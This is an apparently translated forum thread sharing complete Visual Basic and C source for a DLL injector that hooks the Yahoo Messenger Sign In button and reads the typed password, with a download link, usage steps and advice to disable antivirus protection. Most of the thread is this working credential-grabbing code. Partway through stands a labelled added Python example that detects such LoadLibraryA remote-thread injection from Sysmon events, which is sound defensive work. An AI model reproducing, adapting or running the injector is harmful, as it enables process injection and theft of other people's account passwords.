vladiii

Retrieve Yahoo! Messenger Password

I wrote a small program that injects a DLL into Yahoo Messenger. Basically, I intercept the messages Windows sends to the Sign In button... When I receive a WM_COMMAND message (with BN_CLICKED), I read the password from the Password field and display it in a message box. The injector is written in VB and the DLL in C [because VB sux and I couldn't manage to write a DLL that executes something when I inject it into the YahooMessenger process]. I'll present the source code here. [The VB injector is like any other DLL injector and has nothing special about it... The thing is, I couldn't find a DLL injector written in VB on the net, so I wrote one myself (obviously, with help from injectors written in other programming languages)]. In this injector I also left some MsgBoxes that display the handle values. If any handle is 0, click inject again (it's possible the DLL won't be injected on the first try). Besides that, your AV may warn you, but that's no problem, disable Proactive Defense (in Kaspersky...).

Let's look at the injector code (in a module):

Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Public Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function IsWindow Lib "user32" (ByVal hwnd As Long) As Long
Public Const PAGE_READWRITE As Long = &H4
Public Const MEM_COMMIT As Long = &H1000
Public Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Public Const SYNCHRONIZE As Long = &H100000
Public Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
Public Const INFINITE As Long = &HFFFFFF

Public Sub injectdll(ByVal procid As Long, ByVal inject As String)
Dim hProcess As Long
Dim lpRemoteAddress As Long
Dim inj As Long
Dim k32 As Long
Dim dwtid As Long
Dim asd As Long

hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, procid)
If (hProcess = 0) Then
MsgBox "A aparut o eroare!"
End If
asd = GetModuleHandle("kernel32.dll")
k32 = GetProcAddress(asd, "LoadLibraryA")
lpRemoteAddress = VirtualAllocEx(hProcess, 0, Len(inject), MEM_COMMIT, PAGE_READWRITE)
MsgBox lpRemoteAddress
inj = WriteProcessMemory(hProcess, ByVal lpRemoteAddress, ByVal inject, LenB(inject), dwBytesWritten)
MsgBox inj
If (inj <> 0) Then
hRemoteThread = CreateRemoteThread(hProcess, 0, 0, ByVal k32, ByVal lpRemoteAddress, 0, dwtid)
MsgBox hRemoteThread
End If
WaitForSingleObject hRemoteThread, INFINITE
CloseHandle hProcess
CloseHandle hRemoteThread
End Sub

And on a button inside the form:

Private Sub Command1_Click()
Dim pid As Long
Dim handle As Long
handle = FindWindow("YahooBuddyMain", vbNullString)
'Find the PID of the process
Call GetWindowThreadProcessId(handle, pid)
'Call the function that injects the DLL
Call injectdll(pid, "C:\Project1.dll")
End Sub

And now the DLL, written in C and compiled in Dev-C++ [obviously, it is a DLL-type project]. I wrote the code in dllmain.c, and Dev created a file for me, dll.h! Let's look at the code:

/* Replace "dll.h" with the name of your header */
#include "dll.h"
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

DWORD WINAPI Main();
LRESULT CALLBACK NewWndProc(HWND,UINT,WPARAM,LPARAM);

LONG OldWndProc; // the YahooMessenger window procedure

BOOL APIENTRY DllMain (HINSTANCE hInst /* Library instance handle. */ ,
DWORD reason /* Reason this function is being called. */ ,
LPVOID reserved /* Not used. */ )
{
switch (reason)
{
case DLL_PROCESS_ATTACH:
//Create a new thread in which we will run our code
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)&Main,NULL,0,NULL);

case DLL_PROCESS_DETACH:
break;

case DLL_THREAD_ATTACH:
break;

case DLL_THREAD_DETACH:
break;
}

/* Returns TRUE on success, FALSE on failure */
return TRUE;
}

DWORD WINAPI Main()
{
HWND hand1=FindWindow("YahooBuddyMain", NULL);
HWND hand2=FindWindowEx(hand1, 0, "#32770", NULL);
//The Sign In button is a child of the window with handle hand2
OldWndProc=SetWindowLong(hand2,GWL_WNDPROC,(long)NewWndProc);
ExitThread(0);
}

LRESULT CALLBACK NewWndProc(HWND hWnd,UINT Message,WPARAM wParam,LPARAM lParam)
{
switch(Message)
{
case WM_COMMAND:
{
//If the Sign In button is "pressed" then...
if(HIWORD(wParam)==BN_CLICKED && LOWORD(wParam)==1) {
LPARAM pass;
long len;

HWND hwnd=FindWindow("YahooBuddyMain",0);
hwnd=FindWindowEx(hwnd, 0, "#32770", NULL);
HWND hwnd2=FindWindowEx(hwnd, 0, "Edit", NULL);
hwnd=FindWindowEx(hwnd, hwnd2, "Edit", NULL);

len=SendMessage(hwnd, WM_GETTEXTLENGTH,0,0);
len+=1;
pass=(LPARAM)malloc(len);
SendMessage(hwnd, WM_GETTEXT, len, pass);

//Display it
MessageBox (0, (char*)pass, (char*)pass, 0);
}
}
}
// Forward the messages to where they were actually supposed to go
return CallWindowProc((WNDPROC)OldWndProc,hWnd,Message,wParam,lParam);
}

That's about it. I hope it will be useful to someone, sometime!

P.S. Thanks to SlicK for all the help [you're the man].
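
From the defender's side, the technique in the post above leaves a recognizable trail: a handle opened with PROCESS_ALL_ACCESS (0x1F0FFF, from the post's constants) followed by a remote thread that starts at LoadLibraryA. The following is an added example, not part of the original post: it correlates Sysmon ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) records; the sample events, image paths and PIDs are constructed, and the function name is hypothetical.

```python
# Added example, not from the original post. Correlates Sysmon ProcessAccess
# (Event ID 10) and CreateRemoteThread (Event ID 8) records to flag the
# OpenProcess -> WriteProcessMemory -> CreateRemoteThread(LoadLibraryA) chain.

PROCESS_ALL_ACCESS = 0xF0000 | 0x100000 | 0xFFF  # 0x1F0FFF, same value as the post
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_WRITE = 0x0020
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_WRITE
LOADER_EXPORTS = {"loadlibrarya", "loadlibraryw", "loadlibraryexa", "loadlibraryexw"}

# Constructed sample events; image paths and PIDs are hypothetical.
INJ = r"C:\Users\test\injecter.exe"
TGT = r"C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe"
AV = r"C:\Program Files\ExampleAV\scanner.exe"
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceProcessId": 4120, "TargetProcessId": 2288,
     "SourceImage": INJ, "TargetImage": TGT, "GrantedAccess": "0x1F0FFF"},
    {"EventID": 10, "SourceProcessId": 900, "TargetProcessId": 2288,
     "SourceImage": AV, "TargetImage": TGT, "GrantedAccess": "0x1000"},
    {"EventID": 8, "SourceProcessId": 4120, "TargetProcessId": 2288,
     "SourceImage": INJ, "TargetImage": TGT,
     "StartModule": r"C:\Windows\System32\kernel32.dll",
     "StartFunction": "LoadLibraryA"},
    {"EventID": 8, "SourceProcessId": 900, "TargetProcessId": 2288,
     "SourceImage": AV, "TargetImage": TGT,
     "StartModule": r"C:\Program Files\ExampleAV\hook.dll", "StartFunction": "-"},
]

def find_loadlibrary_injection(events):
    """Return (source_image, target_image) pairs where a process obtained
    write + thread-creation rights on another process and then started a
    remote thread at a LoadLibrary* export inside it."""
    armed = set()   # (source_pid, target_pid) pairs holding injection-capable access
    alerts = []
    for ev in events:
        pair = (ev["SourceProcessId"], ev["TargetProcessId"])
        if ev["EventID"] == 10:
            if int(ev["GrantedAccess"], 16) & INJECT_RIGHTS == INJECT_RIGHTS:
                armed.add(pair)
        elif ev["EventID"] == 8:
            func = (ev.get("StartFunction") or "").lower()
            if func in LOADER_EXPORTS and pair in armed:
                alerts.append((ev["SourceImage"], ev["TargetImage"]))
    return alerts

if __name__ == "__main__":
    for src, dst in find_loadlibrary_injection(SAMPLE_EVENTS):
        print(f"ALERT: {src} loaded a DLL into {dst} via a remote thread")
```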


ehh, the DLL would help me ... :-< ... http://rstcenter.com/forum/am-uitat-parola-la-id-personal-pe-care-sunt-logat-si-acum-t9954.rst

I don't know what to do to recover it.... I don't want to part with this ID ... and make another one ... I'm online because I left remember id and password on, but if my Windows breaks... I'm screwed ... please help me too :(( ... I'll owe you. vladiii, can you help me? :(( give me some support on mess too because I'm not good at this ..... :| ... I'd really be grateful... :|


^ I uploaded both the injector and the DLL here:

http://rapidshare.com/files/88602000/RetriveY_Pass.rar.html

Save Project1.dll in C:\, log out of messenger, run injecter.exe, then click Sign In and it will display a msgbox with the password. However, if your password had more than 8 characters, that field will contain: "password". In that case there is nothing more you can do, because the password decryption algorithm is not known.

Good luck!


Did you look at the source code? :) Apparently NOT!

1) Those 3 MsgBoxes are there to confirm that the DLL was injected. If the value in any MsgBox is 0, then the DLL was not injected and you have to press Inject once more.

2) The MessageBox with your password will be displayed when you click Sign In, because I subclass this button.


Now I managed it. The program works fine. :)

You said that if my password has more than 8 characters, the password field will contain the word "Password". Even if your password is shorter than 8 characters, that field will still contain the word "Password". When I inject and click sign in, it shows me "Password" and not my password. Correct me if I'm wrong.
